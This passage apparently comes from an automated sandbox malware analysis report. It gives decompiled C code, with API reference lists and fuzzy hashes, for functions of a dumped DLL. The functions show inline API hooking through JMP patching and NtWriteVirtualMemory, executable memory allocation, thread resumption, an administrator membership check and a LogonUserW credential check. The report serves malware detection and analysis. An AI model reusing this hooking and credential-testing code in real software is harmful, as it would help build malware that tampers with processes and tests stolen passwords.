    								_t44 = _v40;
    								_t49 = _t47 + _t32;
    								_v132 = 0;
    								_t30 = NtWriteVirtualMemory(0xffffffff, _t49, _v48, _t44,  &_v132);
    								_push(_t44);
    								_push(_t49);
    								_push(0xffffffff);
    								L6ECAC336();
    								return _t30;
    							}
    							L11:
    							_t31 = _t32 + _v104;
    						}
    					} while (_t31 < _v56);
    					return _t28;
    				}
    			}

    Instruction addresses: 0x6eca840f 0x6eca8413 0x6eca8417 0x6eca8420 0x6eca84f2 0x6eca8426 0x6eca8427 0x6eca842c 0x6eca8431 0x6eca8431 0x6eca8437 0x6eca8438 0x6eca8449 0x6eca844f 0x6eca8453 0x6eca845a 0x6eca846b 0x6eca846f 0x6eca8490 0x6eca8491 0x6eca8496 0x6eca849e 0x00000000 0x00000000 0x6eca84a4 0x6eca84a9 0x00000000 0x00000000 0x00000000 0x6eca84a9 0x6eca84c1 0x6eca84d0 0x6eca84d5 0x6eca84dd 0x6eca84e2 0x6eca84e3 0x6eca84e4 0x6eca84e6 0x00000000 0x6eca84ed 0x6eca84ab 0x6eca84ab 0x6eca84ab 0x6eca84af 0x6eca84c0 0x6eca84c0

    APIs
    • NtQuerySystemInformation.NTDLL ref: 6ECA8417
    • RtlZeroMemory.NTDLL(?,0000001C), ref: 6ECA8438
    • NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6ECA8453
    • RtlCompareMemory.NTDLL(?,00000000,?), ref: 6ECA8496
    • NtWriteVirtualMemory.NTDLL ref: 6ECA84DD
    • NtFlushInstructionCache.NTDLL(000000FF,00000000,?), ref: 6ECA84E6
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Memory$QueryVirtual$CacheCompareFlushInformationInstructionSystemWriteZero
    • String ID:
    • API String ID: 145697856-0
    • Opcode ID: 92bdbddc8fdcd93e62d6c8dcaaa6e0767290826994ed08ae17d255c7e79ee310
    • Instruction ID: dacf5185e5f6dacb8eced0360f7520e875a5afdcec785b1555503dc23a4581af
    • Opcode Fuzzy Hash: 92bdbddc8fdcd93e62d6c8dcaaa6e0767290826994ed08ae17d255c7e79ee310
    • Instruction Fuzzy Hash: 9F21C272108346AFD310DE99DC84EABBBA9EBC4764F400B1DFAA456144E774D9448B62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 31%
    			E6ECA6480() {
    				intOrPtr* _v24;
    				intOrPtr _v40;
    				void* _v104;
    				void* _v112;
    				intOrPtr* _v124;
    				char _v128;
    				char* _v132;
    				char _v136;
    				intOrPtr* _v140;
    				intOrPtr* _v144;
    				char _v148;
    				intOrPtr* _v152;
    				intOrPtr* _v160;
    				void* _v164;
    				intOrPtr _v168;
    				intOrPtr* _v180;
    				void* _v184;
    				char _v192;
    				short _v196;
    				char _v200;
    				intOrPtr* _v208;
    				intOrPtr _v224;
    				intOrPtr* _v236;
    				intOrPtr* _v244;
    				intOrPtr* _v256;
    				intOrPtr* _v264;
    				intOrPtr* _v276;
    				char* _t66;
    				intOrPtr* _t68;
    				intOrPtr* _t71;
    				intOrPtr* _t73;
    				intOrPtr* _t76;
    				intOrPtr* _t78;
    				intOrPtr* _t81;
    				intOrPtr* _t83;
    				intOrPtr* _t86;
    				intOrPtr* _t89;
    				intOrPtr* _t91;
    				intOrPtr* _t95;
    				intOrPtr* _t98;
    				intOrPtr* _t101;
    				intOrPtr* _t103;
    				intOrPtr* _t105;
    				intOrPtr* _t108;
    				intOrPtr* _t111;
    				intOrPtr* _t114;
    				intOrPtr* _t116;
    				short _t164;
    
    				_t164 = 0;
    				__imp__CoInitializeEx(0, 0);
    				_t66 =  &_v104;
    				_v104 = 0;
    				__imp__CoCreateInstance(0x6ecadb8c, 0, 1, 0x6ecaddac, _t66);
    				if(_t66 < 0) {
    					L19:
    					__imp__CoUninitialize();
    					return _t164;
    				}
    				_t68 = _v124;
    				_push( &_v112);
    				_push(2);
    				_push(0);
    				_v112 = 0;
    				_push( *_v24);
    				_push(_t68);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x54))))() < 0) {
    					L18:
    					_t71 = _v144;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t71 + 8))))(_t71);
    					goto L19;
    				}
    				_t73 = _v144;
    				_v136 = 0;
    				_push( &_v136);
    				_push(_t73);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x38))))() < 0) {
    					L17:
    					_t76 = _v140;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
    					goto L18;
    				}
    				_t78 = _v144;
    				_push(_v40);
    				_push(_t78);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x38))))() < 0) {
    					L16:
    					_t81 = _v152;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 8))))(_t81);
    					goto L17;
    				}
    				asm("movq xmm0, [0x6ecadb9c]");
    				_t83 = _v160;
    				_push( &_v164);
    				asm("movq [esp+0x30], xmm0");
    				asm("movq xmm0, [0x6ecadba4]");
    				_push( &_v128);
    				_v164 = 0;
    				asm("movq [esp+0x3c], xmm0");
    				_push(0x6ecadbac);
    				_push(_t83);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x20))))() < 0) {
    					goto L16;
    				}
    				_t86 = _v180;
    				_push(2);
    				_push(_v168);
    				_push(_t86);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))() < 0) {
    					L15:
    					_t89 = _v192;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
    					goto L16;
    				}
    				_t91 = _v192;
    				_push( &_v184);
    				_v196 = 0;
    				_v184 = 0;
    				_push( &_v196);
    				_push(_t91);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x28))))() >= 0) {
    					L6ECAC2EE();
    					_v132 = L"ImageQuality";
    					__imp__#8( &_v192,  &_v136, 0x20);
    					asm("movss xmm0, [0x6ecada54]");
    					_v196 = 4;
    					_t95 = _v208;
    					asm("movss [esp+0x2c], xmm0");
    					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x10))))(_t95, 1,  &_v148,  &_v196);
    					_t98 = _v236;
    					_push(_v224);
    					_push(_t98);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0xc))))() >= 0) {
    						asm("movq xmm0, [0x6ecadbbc]");
    						_t105 = _v244;
    						_push(_v128);
    						asm("movq [esp+0x40], xmm0");
    						asm("movq xmm0, [0x6ecadbc4]");
    						asm("movq [esp+0x48], xmm0");
    						_push(_v132);
    						_push(_t105);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x10))))() >= 0) {
    							_t108 = _v256;
    							_push( &_v200);
    							_push(_t108);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x18))))() >= 0) {
    								_t111 = _v264;
    								_push(0);
    								_push(_v244);
    								_push(_t111);
    								if( *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x2c))))() >= 0) {
    									_t114 = _v276;
    									_push(_t114);
    									if( *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0x30))))() >= 0) {
    										_t116 = _v276;
    										_push(_t116);
    										if( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x2c))))() >= 0) {
    											_t164 = 1;
    										}
    									}
    								}
    							}
    						}
    					}
    					_t101 = _v244;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t101 + 8))))(_t101);
    					_t103 = _v236;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103);
    				}
    			}

    Instruction addresses: 0x6eca6484 0x6eca6488 0x6eca648e 0x6eca64a0 0x6eca64a4 0x6eca64ac 0x6eca66c9 0x6eca66c9 0x6eca66d5 0x6eca66d5 0x6eca64b2 0x6eca64ba 0x6eca64c1 0x6eca64c3 0x6eca64c4 0x6eca64ca 0x6eca64cb 0x6eca64d3 0x6eca66bd 0x6eca66bd 0x6eca66c7 0x00000000 0x6eca66c7 0x6eca64d9 0x6eca64e1 0x6eca64e7 0x6eca64e8 0x6eca64f0 0x6eca66b1 0x6eca66b1 0x6eca66bb 0x00000000 0x6eca66bb 0x6eca64f6 0x6eca6500 0x6eca6501 0x6eca6509 0x6eca66a5 0x6eca66a5 0x6eca66af 0x00000000 0x6eca66af 0x6eca650f 0x6eca6517 0x6eca651f 0x6eca6524 0x6eca652a 0x6eca6532 0x6eca6533 0x6eca6537 0x6eca653f 0x6eca6544 0x6eca654c 0x00000000 0x00000000 0x6eca6552 0x6eca655c 0x6eca655e 0x6eca655f 0x6eca6567 0x6eca6699 0x6eca6699 0x6eca66a3 0x00000000 0x6eca66a3 0x6eca656d 0x6eca6575 0x6eca657a 0x6eca657e 0x6eca6584 0x6eca6585 0x6eca658d 0x6eca659a 0x6eca65a4 0x6eca65ac 0x6eca65b2 0x6eca65c4 0x6eca65c9 0x6eca65d2 0x6eca65e0 0x6eca65e2 0x6eca65ec 0x6eca65ed 0x6eca65f5 0x6eca65ff 0x6eca6607 0x6eca660b 0x6eca6610 0x6eca6616 0x6eca661e 0x6eca6626 0x6eca6627 0x6eca662f 0x6eca6631 0x6eca663b 0x6eca663c 0x6eca6644 0x6eca6646 0x6eca6650 0x6eca6651 0x6eca6652 0x6eca665a 0x6eca665c 0x6eca6665 0x6eca666a 0x6eca666c 0x6eca6675 0x6eca667a 0x6eca667c 0x6eca667c 0x6eca667a 0x6eca666a 0x6eca665a 0x6eca6644 0x6eca662f 0x6eca6681 0x6eca668b 0x6eca668d 0x6eca6697 0x6eca6697

    APIs
    • CoInitializeEx.OLE32(00000000,00000000,00000000), ref: 6ECA6488
    • CoCreateInstance.OLE32(6ECADB8C,00000000,00000001,6ECADDAC,?), ref: 6ECA64A4
    • RtlZeroMemory.NTDLL(?,00000020), ref: 6ECA659A
    • VariantInit.OLEAUT32 ref: 6ECA65AC
    • CoUninitialize.OLE32 ref: 6ECA66C9
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateInitInitializeInstanceMemoryUninitializeVariantZero
    • String ID:
    • API String ID: 884428471-0
    • Opcode ID: 8203bda6a9b630d009662cfc5fd465d8e4e5a05deb9a6034e84f3406d32ecf42
    • Instruction ID: 7c6c3e2e18b0edd9541da62dfeb81d10876908a0bc96beea648b04d08a5f1441
    • Opcode Fuzzy Hash: 8203bda6a9b630d009662cfc5fd465d8e4e5a05deb9a6034e84f3406d32ecf42
    • Instruction Fuzzy Hash: E071A5B4614702AFD700DFA9C890E5AB7F9AFC9704B108958FA49CB260DB71E946CB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 57%
    			E6ECA1C00(intOrPtr _a4) {
    				long _v4;
    				intOrPtr* _t24;
    				intOrPtr _t30;
    				signed int _t37;
    				intOrPtr _t39;
    				void* _t40;
    
    				_t39 = _a4;
    				_t40 = 1;
    				if(_t39 == 0 ||  *((intOrPtr*)(_t39 + 4)) != 0x3c ||  *((intOrPtr*)(_t39 + 0xc)) == 0) {
    					L14:
    					return 0;
    				} else {
    					_t30 = _t39 + 0x10;
    					_a4 = _t30;
    					if( *((intOrPtr*)(_t39 + 0x10)) == 0) {
    						goto L14;
    					} else {
    						if( *(_t39 + 0x1c) != 0) {
    							_t37 = 0;
    							if( *((intOrPtr*)(_t39 + 0x20)) > 0) {
    								do {
    									FreeLibrary( *( *(_t39 + 0x1c) + _t37 * 4));
    									_t37 = _t37 + 1;
    								} while (_t37 <  *((intOrPtr*)(_t39 + 0x20)));
    								_t30 = _a4;
    							}
    							HeapFree(GetProcessHeap(), 0,  *(_t39 + 0x1c));
    						}
    						if(( *(_t39 + 8) & 0x00000001) == 0) {
    							_t24 =  *((intOrPtr*)(_t39 + 0x14));
    							if(_t24 != 0) {
    								_t40 =  *_t24( *((intOrPtr*)(_t39 + 0xc)), 0, 0);
    							}
    						}
    						_push(0x8000);
    						_push( &_v4);
    						_push(_t30);
    						_push(0xffffffff);
    						_v4 = 0;
    						L6ECAC2D6();
    						return _t40;
    					}
    				}
    			}

    Instruction addresses: 0x6eca1c04 0x6eca1c08 0x6eca1c0f 0x6eca1cb3 0x6eca1cb7 0x6eca1c29 0x6eca1c2d 0x6eca1c30 0x6eca1c34 0x00000000 0x6eca1c36 0x6eca1c3a 0x6eca1c3d 0x6eca1c42 0x6eca1c50 0x6eca1c57 0x6eca1c59 0x6eca1c5a 0x6eca1c5f 0x6eca1c5f 0x6eca1c70 0x6eca1c76 0x6eca1c7b 0x6eca1c7d 0x6eca1c82 0x6eca1c8e 0x6eca1c8e 0x6eca1c82 0x6eca1c90 0x6eca1c99 0x6eca1c9a 0x6eca1c9b 0x6eca1c9d 0x6eca1ca5 0x6eca1cb0 0x6eca1cb0 0x6eca1c34

    APIs
    • FreeLibrary.KERNEL32 ref: 6ECA1C57
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA1C69
    • HeapFree.KERNEL32(00000000), ref: 6ECA1C70
    • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 6ECA1CA5
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$Heap$LibraryMemoryProcessVirtual
    • String ID:
    • API String ID: 1020761401-0
    • Opcode ID: 83d685927752f34a01f3a07dc2b72e7d350c085bcddaace896b3ba3be975a263
    • Instruction ID: eec58156d58d4437c2b6c0dca0ce63267ff7607eed61fb5c46bf2eb21bc9a6fc
    • Opcode Fuzzy Hash: 83d685927752f34a01f3a07dc2b72e7d350c085bcddaace896b3ba3be975a263
    • Instruction Fuzzy Hash: FF2160B12047169FE720CF9CD884B67B3F8FB88759F004A1DE69697684E770E848CB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECAB270(void** _a4) {
    				void* _t6;
    				void* _t7;
    				void** _t13;
    				signed int _t17;
    				void* _t20;
    				void* _t22;
    
    				_t13 = _a4;
    				if( *_t13 != 0) {
    					_t17 = 0;
    					if(_t13[2] <= 0) {
    						L7:
    						_t7 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
    						return HeapFree(_t7, 0,  *_t13);
    					}
    					do {
    						_t20 = E6ECAAE20(0x5a, 0,  *((intOrPtr*)( *_t13 + _t17 * 4)));
    						_t22 = _t22 + 0xc;
    						if(_t20 != 0) {
    							NtResumeThread(_t20, 0);
    							NtClose(_t20);
    						}
    						_t17 = _t17 + 1;
    						_t5 =  &(_t13[2]); // 0xc30cc483
    					} while (_t17 <  *_t5);
    					goto L7;
    				}
    				return _t6;
    			}

    Instruction addresses: 0x6ecab271 0x6ecab278 0x6ecab27b 0x6ecab280 0x6ecab2b0 0x6ecab2b2 0x00000000 0x6ecab2c1 0x6ecab283 0x6ecab292 0x6ecab294 0x6ecab299 0x6ecab29e 0x6ecab2a4 0x6ecab2a4 0x6ecab2a9 0x6ecab2aa 0x6ecab2aa 0x00000000 0x6ecab2af 0x6ecab2c3

    APIs
    • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,6ECAB44C,?,76D24970,00000000), ref: 6ECAB2BB
      • Part of subcall function 6ECAAE20: NtOpenThread.NTDLL ref: 6ECAAE72
    • NtResumeThread.NTDLL ref: 6ECAB29E
    • NtClose.NTDLL(00000000), ref: 6ECAB2A4
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$CloseFreeHeapOpenResume
    • String ID:
    • API String ID: 3496683721-0
    • Opcode ID: 2d17067cdd078ec5d34f64082065899c043bec2903c615e22dbe5cc156c27c78
    • Instruction ID: 1127cb086c61c7a5889682e3ab8e999461f48b8a6bb511d8faab724022b48d42
    • Opcode Fuzzy Hash: 2d17067cdd078ec5d34f64082065899c043bec2903c615e22dbe5cc156c27c78
    • Instruction Fuzzy Hash: 0BF05431641516AFDB118AD8CC91F9E33AAAFC5711F118255FB045F28DE770AC42DBE1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E6ECA3220(intOrPtr _a4) {
    				short _v4;
    				struct _SID_IDENTIFIER_AUTHORITY _v8;
    				char _v12;
    				void* _v16;
    				PSID* _t19;
    
    				_t19 =  &_v16;
    				_v12 = 0;
    				_v16 = 0;
    				_v8.Value = 0;
    				_v4 = 0x500;
    				if(AllocateAndInitializeSid( &_v8, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t19) != 0) {
    					__imp__CheckTokenMembership(_a4, _v16,  &_v12);
    					FreeSid( *_t19);
    				}
    				return _v12;
    			}

    Instruction addresses: 0x6eca3220 0x6eca323d 0x6eca3241 0x6eca3245 0x6eca3249 0x6eca3258 0x6eca3268 0x6eca3272 0x6eca3272 0x6eca327f

    APIs
    • AllocateAndInitializeSid.ADVAPI32 ref: 6ECA3250
    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 6ECA3268
    • FreeSid.ADVAPI32(00000000,?,?), ref: 6ECA3272
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocateCheckFreeInitializeMembershipToken
    • String ID:
    • API String ID: 3429775523-0
    • Opcode ID: fe12a2db07c73f07d0d7c99e8fceb24f7210bd82655d7e86d932bece268ad7ad
    • Instruction ID: 01eead755f995b80d7b8f3a4538eea3b184fb50f39a11238f709e1062c3765ca
    • Opcode Fuzzy Hash: fe12a2db07c73f07d0d7c99e8fceb24f7210bd82655d7e86d932bece268ad7ad
    • Instruction Fuzzy Hash: 49F0A9B4618301AFE740EB68C989E2FB7F8EB88704F405D1DB995C3251E7709805CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA5130(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
    				void* _v4;
    				long _t16;
    				int _t17;
    
    				_t16 = 0;
    				_v4 = 0;
    				_t17 = LogonUserW(_a4, _a8, _a12, 2, 0,  &_v4);
    				if(_t17 != 0 || GetLastError() == 0x52f) {
    					_t16 = 1;
    					if(_t17 != 0) {
    						CloseHandle(_v4);
    					}
    				}
    				return _t16;
    			}

    Instruction addresses: 0x6eca5144 0x6eca514c 0x6eca5156 0x6eca515a 0x6eca5169 0x6eca5170 0x6eca5177 0x6eca5177 0x6eca5170 0x6eca5182

    APIs
    • LogonUserW.ADVAPI32(00CD21B8,00CD21B8,6ECA96ED,00000002,00000000,00CD3FB0), ref: 6ECA5150
    • GetLastError.KERNEL32 ref: 6ECA515C
    • CloseHandle.KERNEL32(?), ref: 6ECA5177
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseErrorHandleLastLogonUser
    • String ID:
    • API String ID: 917161313-0
    • Opcode ID: 18d8d15fc646d9575c9fe46d24796278c87ee75c64534e6aab103610feb92b90
    • Instruction ID: fe2abbcc3ff04fbc2b3b0b5c85f66ff4aa85ea99a25d1c7e281dd718e08b1775
    • Opcode Fuzzy Hash: 18d8d15fc646d9575c9fe46d24796278c87ee75c64534e6aab103610feb92b90
    • Instruction Fuzzy Hash: C1F05EB66046116BD2208B5CD948E6F7BBAEBC9751F018A18FA56C3244D730C801CB72
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E6ECA14E0(signed int __eax) {
    				void* _t23;
    				intOrPtr _t30;
    				void* _t31;
    				void* _t32;
    				intOrPtr _t33;
    				intOrPtr _t34;
    				intOrPtr* _t38;
    				intOrPtr _t41;
    				signed int _t44;
    				PVOID* _t48;
    				signed int _t51;
    				intOrPtr _t52;
    				void* _t53;
    
    				_t52 =  *((intOrPtr*)(_t53 + 0x10));
    				_t34 =  *((intOrPtr*)(_t52 + 0x138));
    				_t44 =  ~(__eax & 0x00000002);
    				asm("sbb edi, edi");
    				_t32 = 0;
    				if(0 <  *(_t52 + 0x46)) {
    					_t51 =  *(_t52 + 0x46) & 0x0000ffff;
    					_t38 = _t34 + 0xc;
    					do {
    						_t41 =  *((intOrPtr*)(_t38 - 4));
    						if(_t41 != 0) {
    							_t30 =  *_t38;
    							_t44 =  <  ? _t30 : _t44;
    							_t31 = _t30 + _t41;
    							if(_t31 > _t32) {
    								_t32 = _t31;
    							}
    						}
    						_t38 = _t38 + 0x28;
    						_t51 = _t51 - 1;
    					} while (_t51 != 0);
    				}
    				_t48 = _t52 + 0x148;
    				_t33 = _t32 - _t44;
    				 *((intOrPtr*)(_t53 + 0x30)) = _t33;
    				 *_t48 =  *((intOrPtr*)(_t52 + 0x74)) + _t44;
    				if(NtAllocateVirtualMemory(0xffffffff, _t48, 0, _t53 + 0x20, 0x3000, 0x40) < 0) {
    					 *_t48 = 0;
    				}
    				_t23 =  *_t48;
    				 *((intOrPtr*)(_t52 + 0x144)) =  *((intOrPtr*)(_t52 + 0x74));
    				if(_t23 != 0) {
    					L14:
    					asm("sbb eax, eax");
    					return ( ~_t23 & 0xfffffffd) + 3;
    				} else {
    					if(( *(_t52 + 0x56) & 0x00000001) == 0) {
    						 *((intOrPtr*)(_t53 + 0x28)) = _t33;
    						if(NtAllocateVirtualMemory(0xffffffff, _t48, 0, _t53 + 0x18, 0x3000, 0x40) < 0) {
    							 *_t48 = 0;
    						}
    						_t23 =  *_t48;
    						 *((intOrPtr*)(_t52 + 0x144)) = _t23 - _t44;
    						goto L14;
    					} else {
    						return 4;
    					}
    				}
    			}

    Instruction addresses: 0x6eca14e3 0x6eca14e7 0x6eca14f4 0x6eca14f6 0x6eca14fa 0x6eca1500 0x6eca1502 0x6eca1506 0x6eca1510 0x6eca1510 0x6eca1515 0x6eca1517 0x6eca151b 0x6eca151e 0x6eca1522 0x6eca1524 0x6eca1524 0x6eca1522 0x6eca1526 0x6eca1529 0x6eca1529 0x6eca1510 0x6eca153d 0x6eca1546 0x6eca154a 0x6eca154e 0x6eca1557 0x6eca1559 0x6eca1559 0x6eca155f 0x6eca1564 0x6eca156c 0x6eca15af 0x6eca15b2 0x6eca15be 0x6eca156e 0x6eca1572 0x6eca1590 0x6eca159b 0x6eca159d 0x6eca159d 0x6eca15a3 0x6eca15a9 0x00000000 0x6eca1574 0x6eca157e 0x6eca157e 0x6eca1572

    APIs
    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 6ECA1550
    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 6ECA1594
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocateMemoryVirtual
    • String ID:
    • API String ID: 2167126740-0
    • Opcode ID: 5b0b043d6e822b136531f3b0edcb56b7ef08a311160dc5b74ff0e4c30d987e9f
    • Instruction ID: dd412d66e1b9f8e2a29d4cd5ace69a63b07d67951ee807d408baa95023978dc7
    • Opcode Fuzzy Hash: 5b0b043d6e822b136531f3b0edcb56b7ef08a311160dc5b74ff0e4c30d987e9f
    • Instruction Fuzzy Hash: 1B21AEB22542465BE724DEADCC90BEA77EAEF80324F20062DEB65CB2C0E771D5448784
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E6ECAB2D0(signed int __eax, intOrPtr _a4) {
    				char _v4;
    				char _v16;
    				signed int _v20;
    				void* _t46;
    				void** _t49;
    
    				_t49 = __eax * 0x2c +  *0x6ecb0950;
    				_t46 =  *_t49;
    				_t50 = 5;
    				if((_t49[5] & 0x00000001) != 0) {
    					_t46 = _t46 - 5;
    					_t50 = 7;
    				}
    				if(E6ECAADE0(_t46, _t50, 0x40,  &_v4) != 0) {
    					if(_a4 == 0) {
    						if((_t49[5] & 0x00000001) == 0) {
    							_push(5);
    							_t15 =  &(_t49[3]); // -1858799940
    						} else {
    							_push(7);
    							_t14 =  &(_t49[3]); // -1858799940
    						}
    						RtlMoveMemory(_t46, ??, ??);
    					} else {
    						 *_t46 = 0xe9;
    						 *((intOrPtr*)(_t46 + 1)) = _t49[1] - _t46 - 5;
    						if((_t49[5] & 0x00000001) != 0) {
    							 *( *_t49) = 0xf9eb;
    						}
    					}
    					E6ECAADE0(_t46, _t50, _v16,  &_v16);
    					_push(_t50);
    					_push(_t46);
    					_push(0xffffffff);
    					L6ECAC336();
    					_t49[5] = ((_v20 & 0x00000001) + (_v20 & 0x00000001) | _t49[5] & 0x000000fd) & 0x000000fb | (_v20 & 0x00000001) + _t27 + (_v20 & 0x00000001) + _t27;
    					return 0;
    				} else {
    					return 0xa;
    				}
    			}

    Instruction addresses: 0x6ecab2d8 0x6ecab2e3 0x6ecab2e5 0x6ecab2ea 0x6ecab2ec 0x6ecab2ee 0x6ecab2ee 0x6ecab306 0x6ecab317 0x6ecab33a 0x6ecab344 0x6ecab346 0x6ecab33c 0x6ecab33c 0x6ecab33e 0x6ecab341 0x6ecab34b 0x6ecab319 0x6ecab319 0x6ecab324 0x6ecab32b 0x6ecab32f 0x6ecab32f 0x6ecab32b 0x6ecab35c 0x6ecab364 0x6ecab365 0x6ecab366 0x6ecab368 0x6ecab389 0x6ecab391 0x6ecab30a 0x6ecab311 0x6ecab311

    APIs
    • RtlMoveMemory.NTDLL(00000000,-6ECB0944,00000005), ref: 6ECAB34B
    • NtFlushInstructionCache.NTDLL(000000FF,00000000,00000005), ref: 6ECAB368
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: CacheFlushInstructionMemoryMove
    • String ID:
    • API String ID: 2209353252-0
    • Opcode ID: 75946ccbde3beefca18aa54d5d0949b17f9dee44706d4f413dee6ff97767df0f
    • Instruction ID: ab5b0bb44837a45490b6e3ebc989d62a22041541dbfe08885c69ef5fc6255106
    • Opcode Fuzzy Hash: 75946ccbde3beefca18aa54d5d0949b17f9dee44706d4f413dee6ff97767df0f
